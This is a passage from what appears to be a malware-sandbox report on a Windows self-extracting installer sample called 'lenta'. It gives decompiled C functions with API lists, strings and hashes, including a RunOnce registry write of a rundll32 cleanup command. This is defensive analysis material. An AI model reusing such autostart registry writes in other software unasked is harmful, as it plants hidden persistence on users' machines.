				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x10e8004; // 0x71a8563c
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x10e8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x10e9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E010E1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E010E171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E010E171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E010E681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E010E67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E010E681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E010E67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E010E6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                                                                0x010e44b9
                                                                                                                                                                                                                                                0x010e44c4
                                                                                                                                                                                                                                                0x010e44cb
                                                                                                                                                                                                                                                0x010e44d8
                                                                                                                                                                                                                                                0x010e44e4
                                                                                                                                                                                                                                                0x010e44eb
                                                                                                                                                                                                                                                0x010e44ee
                                                                                                                                                                                                                                                0x010e44ef
                                                                                                                                                                                                                                                0x010e44ef
                                                                                                                                                                                                                                                0x010e44f1
                                                                                                                                                                                                                                                0x010e44f7
                                                                                                                                                                                                                                                0x010e44f8
                                                                                                                                                                                                                                                0x010e467b
                                                                                                                                                                                                                                                0x010e44fe
                                                                                                                                                                                                                                                0x010e4509
                                                                                                                                                                                                                                                0x010e4518
                                                                                                                                                                                                                                                0x010e4525
                                                                                                                                                                                                                                                0x010e4562
                                                                                                                                                                                                                                                0x010e4568
                                                                                                                                                                                                                                                0x010e4568
                                                                                                                                                                                                                                                0x010e456b
                                                                                                                                                                                                                                                0x010e456b
                                                                                                                                                                                                                                                0x010e456d
                                                                                                                                                                                                                                                0x010e456e
                                                                                                                                                                                                                                                0x010e4572
                                                                                                                                                                                                                                                0x010e4578
                                                                                                                                                                                                                                                0x010e457c
                                                                                                                                                                                                                                                0x010e45cb
                                                                                                                                                                                                                                                0x010e4607
                                                                                                                                                                                                                                                0x010e4607
                                                                                                                                                                                                                                                0x010e460d
                                                                                                                                                                                                                                                0x010e4613
                                                                                                                                                                                                                                                0x010e4617
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e461d
                                                                                                                                                                                                                                                0x010e4623
                                                                                                                                                                                                                                                0x010e4626
                                                                                                                                                                                                                                                0x010e4628
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4628
                                                                                                                                                                                                                                                0x010e45cd
                                                                                                                                                                                                                                                0x010e45cd
                                                                                                                                                                                                                                                0x010e45cf
                                                                                                                                                                                                                                                0x010e45cf
                                                                                                                                                                                                                                                0x010e45d2
                                                                                                                                                                                                                                                0x010e45d2
                                                                                                                                                                                                                                                0x010e45d4
                                                                                                                                                                                                                                                0x010e45d5
                                                                                                                                                                                                                                                0x010e45db
                                                                                                                                                                                                                                                0x010e45de
                                                                                                                                                                                                                                                0x010e45e3
                                                                                                                                                                                                                                                0x010e45e9
                                                                                                                                                                                                                                                0x010e45ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e45f3
                                                                                                                                                                                                                                                0x010e45fd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4602
                                                                                                                                                                                                                                                0x010e45ed
                                                                                                                                                                                                                                                0x010e457e
                                                                                                                                                                                                                                                0x010e457e
                                                                                                                                                                                                                                                0x010e4580
                                                                                                                                                                                                                                                0x010e4580
                                                                                                                                                                                                                                                0x010e4583
                                                                                                                                                                                                                                                0x010e4583
                                                                                                                                                                                                                                                0x010e4585
                                                                                                                                                                                                                                                0x010e4586
                                                                                                                                                                                                                                                0x010e458a
                                                                                                                                                                                                                                                0x010e458c
                                                                                                                                                                                                                                                0x010e458f
                                                                                                                                                                                                                                                0x010e458f
                                                                                                                                                                                                                                                0x010e4591
                                                                                                                                                                                                                                                0x010e4592
                                                                                                                                                                                                                                                0x010e459b
                                                                                                                                                                                                                                                0x010e459e
                                                                                                                                                                                                                                                0x010e45a3
                                                                                                                                                                                                                                                0x010e45a9
                                                                                                                                                                                                                                                0x010e45ad
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e45af
                                                                                                                                                                                                                                                0x010e45af
                                                                                                                                                                                                                                                0x010e45bf
                                                                                                                                                                                                                                                0x010e462d
                                                                                                                                                                                                                                                0x010e4630
                                                                                                                                                                                                                                                0x010e463d
                                                                                                                                                                                                                                                0x010e464e
                                                                                                                                                                                                                                                0x010e464e
                                                                                                                                                                                                                                                0x010e463f
                                                                                                                                                                                                                                                0x010e4640
                                                                                                                                                                                                                                                0x010e4647
                                                                                                                                                                                                                                                0x010e464c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e464c
                                                                                                                                                                                                                                                0x010e4666
                                                                                                                                                                                                                                                0x010e466d
                                                                                                                                                                                                                                                0x010e466f
                                                                                                                                                                                                                                                0x010e4675
                                                                                                                                                                                                                                                0x010e4675
                                                                                                                                                                                                                                                0x010e45ad
                                                                                                                                                                                                                                                0x010e4527
                                                                                                                                                                                                                                                0x010e452e
                                                                                                                                                                                                                                                0x010e453f
                                                                                                                                                                                                                                                0x010e453f
                                                                                                                                                                                                                                                0x010e4530
                                                                                                                                                                                                                                                0x010e4531
                                                                                                                                                                                                                                                0x010e4538
                                                                                                                                                                                                                                                0x010e453d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e453d
                                                                                                                                                                                                                                                0x010e4554
                                                                                                                                                                                                                                                0x010e455a
                                                                                                                                                                                                                                                0x010e455a
                                                                                                                                                                                                                                                0x010e455a
                                                                                                                                                                                                                                                0x010e4525
                                                                                                                                                                                                                                                0x010e468c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 010E45A3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 010E45E3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 010E460D
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 010E4630
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 010E4666
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 010E466F
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010E686E
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: GetSystemMetrics.USER32(0000004A), ref: 010E68A7
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010E68CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,?,0000000C), ref: 010E68F4
                                                                                                                                                                                                                                                  • Part of subcall function 010E681F: RegCloseKey.ADVAPI32(?), ref: 010E6902
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                                • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                                • Opcode ID: 2362a7b513661d46fbd15a98280cb5464b531f3bcd50bd5d1030893e623988fd
                                                                                                                                                                                                                                                • Instruction ID: cb78bf52fc3f647615a0a77254566dad28d9f9eb6bceb1ac941b5de51c49496a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2362a7b513661d46fbd15a98280cb5464b531f3bcd50bd5d1030893e623988fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B510472A00215AFDB219E2ADC4CBAA7BE8EF49700F0441D9EDC9E7205DB36DD05CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x10e8004; // 0x71a8563c
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E010E1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E010E658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E010E658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x10e1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E010E1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E010E6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                                                                0x010e2773
                                                                                                                                                                                                                                                0x010e277e
                                                                                                                                                                                                                                                0x010e2785
                                                                                                                                                                                                                                                0x010e278a
                                                                                                                                                                                                                                                0x010e278d
                                                                                                                                                                                                                                                0x010e2790
                                                                                                                                                                                                                                                0x010e2792
                                                                                                                                                                                                                                                0x010e2798
                                                                                                                                                                                                                                                0x010e279d
                                                                                                                                                                                                                                                0x010e28b2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e27a3
                                                                                                                                                                                                                                                0x010e27a3
                                                                                                                                                                                                                                                0x010e27af
                                                                                                                                                                                                                                                0x010e27c2
                                                                                                                                                                                                                                                0x010e27c8
                                                                                                                                                                                                                                                0x010e27cd
                                                                                                                                                                                                                                                0x010e27d5
                                                                                                                                                                                                                                                0x010e28b7
                                                                                                                                                                                                                                                0x010e28b9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e27db
                                                                                                                                                                                                                                                0x010e27dd
                                                                                                                                                                                                                                                0x010e28aa
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e27e3
                                                                                                                                                                                                                                                0x010e27e3
                                                                                                                                                                                                                                                0x010e27ec
                                                                                                                                                                                                                                                0x010e27f8
                                                                                                                                                                                                                                                0x010e2803
                                                                                                                                                                                                                                                0x010e280b
                                                                                                                                                                                                                                                0x010e2831
                                                                                                                                                                                                                                                0x010e28c3
                                                                                                                                                                                                                                                0x010e28c9
                                                                                                                                                                                                                                                0x010e28cd
                                                                                                                                                                                                                                                0x010e2837
                                                                                                                                                                                                                                                0x010e285a
                                                                                                                                                                                                                                                0x010e285c
                                                                                                                                                                                                                                                0x010e2865
                                                                                                                                                                                                                                                0x010e2892
                                                                                                                                                                                                                                                0x010e2895
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2867
                                                                                                                                                                                                                                                0x010e2878
                                                                                                                                                                                                                                                0x010e288c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e287a
                                                                                                                                                                                                                                                0x010e2880
                                                                                                                                                                                                                                                0x010e2885
                                                                                                                                                                                                                                                0x010e2897
                                                                                                                                                                                                                                                0x010e2899
                                                                                                                                                                                                                                                0x010e2899
                                                                                                                                                                                                                                                0x010e2878
                                                                                                                                                                                                                                                0x010e2865
                                                                                                                                                                                                                                                0x010e28a0
                                                                                                                                                                                                                                                0x010e28bf
                                                                                                                                                                                                                                                0x010e28c1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e28c1
                                                                                                                                                                                                                                                0x010e2831
                                                                                                                                                                                                                                                0x010e27dd
                                                                                                                                                                                                                                                0x010e27d5
                                                                                                                                                                                                                                                0x010e28e5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperA.USER32(71A8563C,00000000,00000000,00000000), ref: 010E27A8
                                                                                                                                                                                                                                                • CharNextA.USER32(0000054D), ref: 010E27B5
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 010E27BC
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2829
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2852
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2870
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E28A0
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010E28AA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 010E28B9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010E27E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                • Opcode ID: fb82445c74c5915658971610231e57e79724568a73cb72334f8445f8789be33c
                                                                                                                                                                                                                                                • Instruction ID: a8898992a58c37551a9b7d7ca8384e5672c5a538c612aa0fffad0cb81eba2002
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb82445c74c5915658971610231e57e79724568a73cb72334f8445f8789be33c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C841BF71A01128AFDB659B669C89AFE7BFCEB59700F0040E9F5C9D7104CB758E858FA0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                			E010E2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x10e8004; // 0x71a8563c
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x10e8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E010E658A( &_v268, 0x104, 0x10e1140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
							E010E171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E010E6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                                                                0x010e2272
                                                                                                                                                                                                                                                0x010e2277
                                                                                                                                                                                                                                                0x010e2279
                                                                                                                                                                                                                                                0x010e2283
                                                                                                                                                                                                                                                0x010e2289
                                                                                                                                                                                                                                                0x010e22ab
                                                                                                                                                                                                                                                0x010e22b1
                                                                                                                                                                                                                                                0x010e22c4
                                                                                                                                                                                                                                                0x010e22e0
                                                                                                                                                                                                                                                0x010e22e6
                                                                                                                                                                                                                                                0x010e22f5
                                                                                                                                                                                                                                                0x010e230d
                                                                                                                                                                                                                                                0x010e231c
                                                                                                                                                                                                                                                0x010e231c
                                                                                                                                                                                                                                                0x010e2321
                                                                                                                                                                                                                                                0x010e233a
                                                                                                                                                                                                                                                0x010e2342
                                                                                                                                                                                                                                                0x010e2348
                                                                                                                                                                                                                                                0x010e234b
                                                                                                                                                                                                                                                0x010e234c
                                                                                                                                                                                                                                                0x010e234c
                                                                                                                                                                                                                                                0x010e234e
                                                                                                                                                                                                                                                0x010e234f
                                                                                                                                                                                                                                                0x010e236e
                                                                                                                                                                                                                                                0x010e236e
                                                                                                                                                                                                                                                0x010e237a
                                                                                                                                                                                                                                                0x010e2380
                                                                                                                                                                                                                                                0x010e2380
                                                                                                                                                                                                                                                0x010e2381
                                                                                                                                                                                                                                                0x010e2381
                                                                                                                                                                                                                                                0x010e238f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010E22A3
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 010E22D8
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E22F5
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 010E2305
                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010E236E
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 010E237A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010E2299
                                                                                                                                                                                                                                                • wextract_cleanup3, xrefs: 010E227C, 010E22CD, 010E2363
                                                                                                                                                                                                                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010E232D
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010E2321
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
                                                                                                                                                                                                                                                • API String ID: 3027380567-1707933020
                                                                                                                                                                                                                                                • Opcode ID: 7d5921f6fcd41dde1b75c8ffcdd0617358a28680dd670a22d5f9bac8957245e1
                                                                                                                                                                                                                                                • Instruction ID: 70048e7a767b88be1c9534ebe36549911bcb1f9ea0c9ffa9f52df40c3a7b32c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d5921f6fcd41dde1b75c8ffcdd0617358a28680dd670a22d5f9bac8957245e1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4331B671A00218AFDB719A67DC4CFEA7BFCEB14740F0401EAB58DAA005DA75AB84CF50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                                			E010E3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x10e8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x10e8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E010E43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x10e8d4c);
					SetWindowTextA(_t33, "lenta");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x10e88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E010E30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                                                                0x010e3108
                                                                                                                                                                                                                                                0x010e310b
                                                                                                                                                                                                                                                0x010e31b7
                                                                                                                                                                                                                                                0x010e31ca
                                                                                                                                                                                                                                                0x010e31d0
                                                                                                                                                                                                                                                0x010e31d0
                                                                                                                                                                                                                                                0x010e31da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e31da
                                                                                                                                                                                                                                                0x010e3111
                                                                                                                                                                                                                                                0x010e3114
                                                                                                                                                                                                                                                0x010e3136
                                                                                                                                                                                                                                                0x010e3136
                                                                                                                                                                                                                                                0x010e3138
                                                                                                                                                                                                                                                0x010e313b
                                                                                                                                                                                                                                                0x010e3141
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3143
                                                                                                                                                                                                                                                0x010e3116
                                                                                                                                                                                                                                                0x010e311b
                                                                                                                                                                                                                                                0x010e314b
                                                                                                                                                                                                                                                0x010e3151
                                                                                                                                                                                                                                                0x010e3158
                                                                                                                                                                                                                                                0x010e316a
                                                                                                                                                                                                                                                0x010e3176
                                                                                                                                                                                                                                                0x010e317d
                                                                                                                                                                                                                                                0x010e318b
                                                                                                                                                                                                                                                0x010e319e
                                                                                                                                                                                                                                                0x010e31a3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e31ad
